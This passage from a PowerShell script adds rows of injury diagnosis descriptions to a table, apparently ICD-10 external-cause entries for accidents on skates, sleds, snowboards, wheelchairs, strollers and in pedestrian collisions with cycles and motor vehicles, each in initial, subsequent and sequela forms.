accident","Other ice-skates accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Other ice-skates accident","Other ice-skates accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other ice-skates accident","Other ice-skates accident, sequela") + $null = $DiagnosisList.Rows.Add("Fall from sled","Fall from sled, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from sled","Fall from sled, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from sled","Fall from sled, sequela") + $null = $DiagnosisList.Rows.Add("Sledder colliding with stationary object","Sledder colliding with stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Sledder colliding with stationary object","Sledder colliding with stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sledder colliding with stationary object","Sledder colliding with stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Other sled accident","Other sled accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sled accident","Other sled accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sled accident","Other sled accident, sequela") + $null = $DiagnosisList.Rows.Add("Fall from other gliding-type pedestrian conveyance","Fall from other gliding-type pedestrian conveyance, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from other gliding-type pedestrian conveyance","Fall from other gliding-type pedestrian conveyance, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from other gliding-type pedestrian conveyance","Fall from other gliding-type pedestrian conveyance, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on other gliding-type pedestrian conveyance colliding with stationary object","Pedestrian on other gliding-type pedestrian conveyance colliding with stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on other gliding-type pedestrian conveyance colliding with stationary object","Pedestrian on other gliding-type pedestrian conveyance colliding with stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on other gliding-type pedestrian conveyance colliding with stationary object","Pedestrian on other gliding-type pedestrian conveyance colliding with stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Other accident on other gliding-type pedestrian conveyance","Other accident on other gliding-type pedestrian conveyance, initial encounter") + $null = $DiagnosisList.Rows.Add("Other accident on other gliding-type pedestrian conveyance","Other accident on other gliding-type pedestrian conveyance, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other accident on other gliding-type pedestrian conveyance","Other accident on other gliding-type pedestrian conveyance, sequela") + $null = $DiagnosisList.Rows.Add("Fall from snowboard","Fall from snowboard, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from snowboard","Fall from snowboard, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from snowboard","Fall from snowboard, sequela") + $null = $DiagnosisList.Rows.Add("Snowboarder colliding with stationary object","Snowboarder colliding with stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Snowboarder colliding with stationary object","Snowboarder colliding with stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Snowboarder colliding with stationary object","Snowboarder colliding with stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Other snowboard accident","Other snowboard accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Other snowboard accident","Other snowboard accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other snowboard accident","Other snowboard accident, sequela") + $null = $DiagnosisList.Rows.Add("Fall from snow-skis","Fall from snow-skis, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from snow-skis","Fall from snow-skis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from snow-skis","Fall from snow-skis, sequela") + $null = $DiagnosisList.Rows.Add("Snow-skier colliding with stationary object","Snow-skier colliding with stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Snow-skier colliding with stationary object","Snow-skier colliding with stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Snow-skier colliding with stationary object","Snow-skier colliding with stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Other snow-ski accident","Other snow-ski accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Other snow-ski accident","Other snow-ski accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other snow-ski accident","Other snow-ski accident, sequela") + $null = $DiagnosisList.Rows.Add("Fall from other flat-bottomed pedestrian conveyance","Fall from other flat-bottomed pedestrian conveyance, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from other flat-bottomed pedestrian conveyance","Fall from other flat-bottomed pedestrian conveyance, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from other flat-bottomed pedestrian conveyance","Fall from other flat-bottomed pedestrian conveyance, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on other flat-bottomed pedestrian conveyance colliding with stationary object","Pedestrian on other flat-bottomed pedestrian conveyance colliding with stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on other flat-bottomed pedestrian conveyance colliding with stationary object","Pedestrian on other flat-bottomed pedestrian conveyance colliding with stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on other flat-bottomed pedestrian conveyance colliding with stationary object","Pedestrian on other flat-bottomed pedestrian conveyance colliding with stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Other accident on other flat-bottomed pedestrian conveyance","Other accident on other flat-bottomed pedestrian conveyance, initial encounter") + $null = $DiagnosisList.Rows.Add("Other accident on other flat-bottomed pedestrian conveyance","Other accident on other flat-bottomed pedestrian conveyance, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other accident on other flat-bottomed pedestrian conveyance","Other accident on other flat-bottomed pedestrian conveyance, sequela") + $null = $DiagnosisList.Rows.Add("Fall from moving wheelchair (powered)","Fall from moving wheelchair (powered), initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from moving wheelchair (powered)","Fall from moving wheelchair (powered), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from moving wheelchair (powered)","Fall from moving wheelchair (powered), sequela") + $null = $DiagnosisList.Rows.Add("Wheelchair (powered) colliding with stationary object","Wheelchair (powered) colliding with stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Wheelchair (powered) colliding with stationary object","Wheelchair (powered) colliding with stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Wheelchair (powered) colliding with stationary object","Wheelchair (powered) colliding with stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Other accident with wheelchair (powered)","Other accident with wheelchair (powered), initial encounter") + $null = $DiagnosisList.Rows.Add("Other accident with wheelchair (powered)","Other accident with wheelchair (powered), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other accident with wheelchair (powered)","Other accident with wheelchair (powered), sequela") + $null = $DiagnosisList.Rows.Add("Fall from babystroller","Fall from babystroller, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from babystroller","Fall from babystroller, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from babystroller","Fall from babystroller, sequela") + $null = $DiagnosisList.Rows.Add("Babystroller colliding with stationary object","Babystroller colliding with stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Babystroller colliding with stationary object","Babystroller colliding with stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Babystroller colliding with stationary object","Babystroller colliding with stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Other accident with babystroller","Other accident with babystroller, initial encounter") + $null = $DiagnosisList.Rows.Add("Other accident with babystroller","Other accident with babystroller, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other accident with babystroller","Other accident with babystroller, sequela") + $null = $DiagnosisList.Rows.Add("Fall from motorized mobility scooter","Fall from motorized mobility scooter, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from motorized mobility scooter","Fall from motorized mobility scooter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from motorized mobility scooter","Fall from motorized mobility scooter, sequela") + $null = $DiagnosisList.Rows.Add("Motorized mobility scooter colliding with stationary object","Motorized mobility scooter colliding with stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorized mobility scooter colliding with stationary object","Motorized mobility scooter colliding with stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorized mobility scooter colliding with stationary object","Motorized mobility scooter colliding with stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Other accident with motorized mobility scooter","Other accident with motorized mobility scooter, initial encounter") + $null = $DiagnosisList.Rows.Add("Other accident with motorized mobility scooter","Other accident with motorized mobility scooter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other accident with motorized mobility scooter","Other accident with motorized mobility scooter, sequela") + $null = $DiagnosisList.Rows.Add("Fall from other pedestrian conveyance","Fall from other pedestrian conveyance, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall from other pedestrian conveyance","Fall from other pedestrian conveyance, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall from other pedestrian conveyance","Fall from other pedestrian conveyance, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on other pedestrian conveyance colliding with stationary object","Pedestrian on other pedestrian conveyance colliding with stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on other pedestrian conveyance colliding with stationary object","Pedestrian on other pedestrian conveyance colliding with stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on other pedestrian conveyance colliding with stationary object","Pedestrian on other pedestrian conveyance colliding with stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Other accident on other pedestrian conveyance","Other accident on other pedestrian conveyance, initial encounter") + $null = $DiagnosisList.Rows.Add("Other accident on other pedestrian conveyance","Other accident on other pedestrian conveyance, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other accident on other pedestrian conveyance","Other accident on other pedestrian conveyance, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with pedal cycle in nontraffic accident","Pedestrian on foot injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with pedal cycle in nontraffic accident","Pedestrian on foot injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with pedal cycle in nontraffic accident","Pedestrian on foot injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with pedal cycle in nontraffic accident","Pedestrian on roller-skates injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with pedal cycle in nontraffic accident","Pedestrian on roller-skates injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with pedal cycle in nontraffic accident","Pedestrian on roller-skates injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with pedal cycle in nontraffic accident","Pedestrian on skateboard injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with pedal cycle in nontraffic accident","Pedestrian on skateboard injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with pedal cycle in nontraffic accident","Pedestrian on skateboard injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with pedal cycle in nontraffic accident","Pedestrian with other conveyance injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with pedal cycle in nontraffic accident","Pedestrian with other conveyance injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with pedal cycle in nontraffic accident","Pedestrian with other conveyance injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with pedal cycle in traffic accident","Pedestrian on foot injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with pedal cycle in traffic accident","Pedestrian on foot injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with pedal cycle in traffic accident","Pedestrian on foot injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with pedal cycle in traffic accident","Pedestrian on roller-skates injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with pedal cycle in traffic accident","Pedestrian on roller-skates injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with pedal cycle in traffic accident","Pedestrian on roller-skates injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with pedal cycle in traffic accident","Pedestrian on skateboard injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with pedal cycle in traffic accident","Pedestrian on skateboard injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with pedal cycle in traffic accident","Pedestrian on skateboard injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with pedal cycle in traffic accident","Pedestrian with other conveyance injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with pedal cycle in traffic accident","Pedestrian with other conveyance injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with pedal cycle in traffic accident","Pedestrian with other conveyance injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with pedal cycle, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle in traffic accident","Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with two- or three-wheeled motor vehicle, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with car, pick-up truck or van in nontraffic accident","Pedestrian on foot injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with car, pick-up truck or van in nontraffic accident","Pedestrian on foot injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with car, pick-up truck or van in nontraffic accident","Pedestrian on foot injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with car, pick-up truck or van in nontraffic accident","Pedestrian on roller-skates injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with car, pick-up truck or van in nontraffic accident","Pedestrian on roller-skates injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with car, pick-up truck or van in nontraffic accident","Pedestrian on roller-skates injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with car, pick-up truck or van in nontraffic accident","Pedestrian on skateboard injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with car, pick-up truck or van in nontraffic accident","Pedestrian on skateboard injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with car, pick-up truck or van in nontraffic accident","Pedestrian on skateboard injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with car, pick-up truck or van in nontraffic accident","Pedestrian with other conveyance injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with car, pick-up truck or van in nontraffic accident","Pedestrian with other conveyance injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with car, pick-up truck or van in nontraffic accident","Pedestrian with other conveyance injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with car, pick-up truck or van in traffic accident","Pedestrian on foot injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with car, pick-up truck or van in traffic accident","Pedestrian on foot injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with car, pick-up truck or van in traffic accident","Pedestrian on foot injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with car, pick-up truck or van in traffic accident","Pedestrian on roller-skates injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with car, pick-up truck or van in traffic accident","Pedestrian on roller-skates injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with car, pick-up truck or van in traffic accident","Pedestrian on roller-skates injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with car, pick-up truck or van in traffic accident","Pedestrian on skateboard injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with car, pick-up truck or van in traffic accident","Pedestrian on skateboard injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with car, pick-up truck or van in traffic accident","Pedestrian on skateboard injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with car, pick-up truck or van in traffic accident","Pedestrian with other conveyance injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with car, pick-up truck or van in traffic accident","Pedestrian with other conveyance injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with car, pick-up truck or van in traffic accident","Pedestrian with other conveyance injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates 